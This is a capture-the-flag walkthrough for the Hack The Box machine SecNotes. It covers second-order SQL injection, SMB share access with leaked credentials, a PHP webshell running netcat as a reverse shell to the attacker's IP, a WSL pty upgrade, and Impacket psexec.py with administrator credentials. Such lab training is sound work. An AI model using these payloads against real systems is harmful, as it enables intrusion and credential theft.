🎶SecNotes

https://app.hackthebox.com/machines/151

After the nmap scan, we see the web server is a login page:

I create an account and log in:

We get access to a dashboard and a possible username

Let's log out and try to abuse the login form with SQL injection.

Logging in with injected credentials produces a database error, which is good news: the input reaches the query unsanitised.

We try a few more SQLi patterns and end up with database contents leaked into the dashboard:

Among them is what looks like credentials for an SMB share:
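As an added illustration (not the SecNotes application's own code), here is how the two observations above fit together: a stray quote in a string-built login query surfaces a database error, and a payload stored as a username at registration is executed later by an equally string-built dashboard query (second-order injection), leaking other users' notes. The table layout, the queries and the payload `' OR 1=1 -- ` are assumptions chosen for the illustration; SQLite in memory keeps it runnable offline, and the hardened, parameterised query is shown beside the vulnerable one.

```python
import sqlite3

# Assumed payload for the illustration; the trailing space keeps the SQL comment valid.
PAYLOAD = "' OR 1=1 -- "


def setup_db() -> sqlite3.Connection:
    """Constructed sample data: one legitimate user with two private notes."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE notes(id INTEGER PRIMARY KEY, username TEXT, title TEXT, body TEXT);
        INSERT INTO users(username, password) VALUES ('tyler', 'tyler-password');
        INSERT INTO notes(username, title, body) VALUES
            ('tyler', 'new-site', 'SMB share credentials (sample note)'),
            ('tyler', 'todo',     'finish the new site');
    """)
    return db


def probe_login(db, username: str, password: str):
    """Login query built by concatenation (assumed). A stray quote breaks the SQL and
    surfaces a database error, the 'good news' seen on the login page.
    Returns the error text, or None when the query ran without error."""
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    try:
        db.execute(sql).fetchall()
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def register(db, username: str, password: str) -> None:
    """Registration itself is parameterised here, so the payload is stored verbatim.
    Nothing is executed yet; the damage happens on the next page that trusts the stored value."""
    db.execute("INSERT INTO users(username, password) VALUES (?, ?)", (username, password))


def dashboard_vulnerable(db, username: str):
    """Second-order injection: the username read back from the database is concatenated
    into the notes query, so a stored username of ' OR 1=1 --  returns every user's notes."""
    sql = f"SELECT title, body FROM notes WHERE username = '{username}'"
    return db.execute(sql).fetchall()


def dashboard_fixed(db, username: str):
    """Hardened form: the same query with a bound parameter; the payload is just a string."""
    return db.execute("SELECT title, body FROM notes WHERE username = ?", (username,)).fetchall()


def demo():
    """Register with the payload, then render the dashboard both ways.
    Returns (rows leaked by the vulnerable query, rows returned by the fixed query)."""
    db = setup_db()
    register(db, PAYLOAD, "anything")
    return len(dashboard_vulnerable(db, PAYLOAD)), len(dashboard_fixed(db, PAYLOAD))


if __name__ == "__main__":
    print(probe_login(setup_db(), "'", "x"))   # database error from the login probe
    print(demo())                              # (2, 0): vulnerable leaks both notes, fixed leaks none
```

The point of the two dashboard functions side by side is that the fix is not "escape the username at registration": the value is already in the database, so every query that reads it back must bind it as a parameter.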

Besides the manual route, we could try psexec.py with those credentials:

psexec.py tyler:'92g!mA8BGjOirkL%OG*&'@10.129.227.170

It did not work. psexec.py needs an account that can write to an administrative share such as ADMIN$, so it fails for a non-admin user:

So let's go manually, with password 92g!mA8BGjOirkL%OG*&:

smbclient \\\\10.129.227.170\\new-site -U tyler

Now create a file called shell.php:

<?php system('nc.exe -e cmd.exe 10.10.14.94 9898'); ?>

Then copy a Windows netcat binary (nc.exe) into your working directory; Kali ships one with sqlninja:

locate nc.exe
cp /usr/share/sqlninja/apps/nc.exe nc.exe

and upload both to tyler's share from the smbclient prompt:

put shell.php
put nc.exe

Uploading shell.php and nc.exe with put gives us a foothold on the target: once shell.php is served by the web server, requesting it makes PHP run nc.exe, which connects back to our listener and hands us cmd.exe. The files stay on the share, so the shell can be re-triggered if the connection drops.

Now I need to trigger shell.php. After some looking around I found where the uploaded files are served from:

So, with a listener waiting on the attacking host (nc -lvnp 9898), I simply request: http://10.129.163.46:8808/shell.php

and get a shell:

and go and grab the flag:

For privilege escalation, let's look at the Windows Subsystem for Linux (WSL):

First we need to locate bash.exe; a recursive search does it:

where /R c:\windows bash.exe

Same for wsl.exe:

where /R c:\windows wsl.exe

Quick explanation of why we're doing this:

After getting a bash shell by running bash.exe, we get some useful info:

We are root, but only inside the WSL Linux environment on SecNotes, not on the Windows host itself, so this is not yet what we are looking for.

We are in a non-tty shell; let's upgrade it.

As a reminder, a non-tty shell is one whose standard input and output are plain pipes rather than a (pseudo-)terminal. Programs that need a terminal misbehave there: no job control, no tab completion, password prompts and editors fail, and Ctrl-C kills the whole connection.

Let's get a proper tty via Python's pty module:

python -c "import pty;pty.spawn('/bin/bash')"
  • python: This invokes the Python interpreter.

  • -c: This option allows you to pass a command directly to Python for execution.

  • "import pty; pty.spawn('/bin/bash')": This is the Python code that gets executed.

    • import pty: This imports the pty module, which provides functions for controlling pseudo-terminals.

    • pty.spawn('/bin/bash'): allocates a new pseudo-terminal, starts /bin/bash attached to it, and copies data between that pseudo-terminal and our current stdin/stdout. Bash therefore believes it is talking to a real terminal and behaves interactively.
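To show concretely what the one-liner changes, here is an added example (not from the original page) that runs the same probe twice: once with its stdin on a pipe-like descriptor, as a process spawned from the webshell sees the world, and once under a fresh pseudo-terminal obtained from the same pty module. The probe command and the helper names are assumptions for the illustration.

```python
import os
import pty
import subprocess
import sys

# Assumed probe: reports whether the process's stdin is a terminal.
PROBE = [sys.executable, "-c", "import os; print('tty' if os.isatty(0) else 'not a tty')"]


def stdin_is_tty(fd: int = 0) -> bool:
    """True when fd refers to a (pseudo-)terminal; this is what a non-tty shell lacks."""
    return os.isatty(fd)


def run_piped(cmd) -> str:
    """Run cmd the way a webshell-spawned process runs: stdin is not a terminal
    (here /dev/null) and stdout is a pipe. Returns the command's output."""
    result = subprocess.run(cmd, stdin=subprocess.DEVNULL, capture_output=True, text=True)
    return result.stdout.strip()


def run_in_pty(cmd) -> str:
    """Run cmd with a freshly allocated pseudo-terminal on fds 0/1/2, which is what
    pty.spawn does for /bin/bash. The parent reads the program's output from the
    master side until the child closes the slave side. Returns the output."""
    master, slave = pty.openpty()
    proc = subprocess.Popen(cmd, stdin=slave, stdout=slave, stderr=slave, close_fds=True)
    os.close(slave)  # only the child holds the slave now
    chunks = []
    while True:
        try:
            data = os.read(master, 4096)
        except OSError:  # EIO on Linux once the child has closed its end
            break
        if not data:
            break
        chunks.append(data)
    proc.wait()
    os.close(master)
    # The terminal line discipline turns \n into \r\n; normalise for comparison.
    return b"".join(chunks).decode().replace("\r\n", "\n").strip()


def upgrade_shell() -> None:
    """The page's one-liner, guarded so it only runs when we are not already on a tty."""
    if not stdin_is_tty():
        pty.spawn("/bin/bash")


if __name__ == "__main__":
    print("piped :", run_piped(PROBE))    # not a tty
    print("pty   :", run_in_pty(PROBE))   # tty
```

The same probe, run by hand inside the shell before and after the one-liner (tty, or python -c "import os; print(os.isatty(0))"), is a quick way to confirm the upgrade worked before trying interactive tools.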

Now let's look at what we have in the root folder:

After looking through it we come across credentials for administrator:

That's a quick and easy win; now let's use them from our own machine.

Impacket Toolkit - https://github.com/SecureAuthCorp/impacket

First, install Impacket, then run psexec.py with the administrator credentials:

psexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.129.163.46
  • psexec.py: Impacket's Python reimplementation of the Sysinternals PsExec tool; it uploads a service binary over SMB and uses it to execute commands on the remote Windows host.

  • administrator:'u6!4ZwgwOM#^OBf#Nwnh': the username and password to authenticate with. The password is wrapped in single quotes so the shell does not interpret characters such as ! (history expansion), # and ^.

  • @10.129.163.46: the IP address or hostname of the target. psexec.py connects to it with the given credentials and drops us into a SYSTEM shell.

Then just go and fetch the root flag.

If A/V blocks psexec.py, smbexec.py (also from Impacket) or winexe are alternatives.
